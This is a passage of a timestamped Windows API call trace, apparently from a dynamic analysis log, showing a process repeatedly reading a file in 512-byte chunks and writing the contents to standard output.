lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] GetFileType (hFile=0x50) returned 0x1 [0128.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.220] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.220] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.220] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.221] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] GetFileType (hFile=0x50) returned 0x1 [0128.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.221] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.222] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.222] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.222] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.222] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.223] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.223] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.223] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] GetFileType (hFile=0x50) returned 0x1 [0128.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.224] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.225] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.225] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.225] GetFileType (hFile=0x50) returned 0x1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] GetFileType (hFile=0x50) returned 0x1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] GetFileType (hFile=0x50) returned 0x1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] GetFileType (hFile=0x50) returned 0x1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.226] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.226] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.226] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.226] GetFileType (hFile=0x50) returned 0x1 [0128.226] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.227] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.228] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.229] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.230] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.231] ReadFile 